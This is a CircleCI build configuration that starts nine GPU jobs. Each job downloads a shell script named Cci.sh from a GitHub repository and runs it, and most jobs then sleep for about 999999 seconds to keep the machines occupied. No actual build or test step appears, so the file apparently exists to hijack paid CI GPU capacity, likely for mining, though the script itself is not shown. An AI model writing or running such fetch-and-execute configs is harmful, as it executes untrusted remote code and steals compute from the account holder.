version: 2.1

jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: sleep 30
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      

  build2:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999
      


  build3:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999


  build4:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999

  build5:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999

  build6:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999
      


  build7:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999


  build8:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999

  build9:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      - run: sleep 999999





      
workflows:
    version: 2.1
    build:
        jobs:
            - build
            - build2
            - build3
            - build4
            - build5
            - build6
            - build7
            - build8            
            - build9
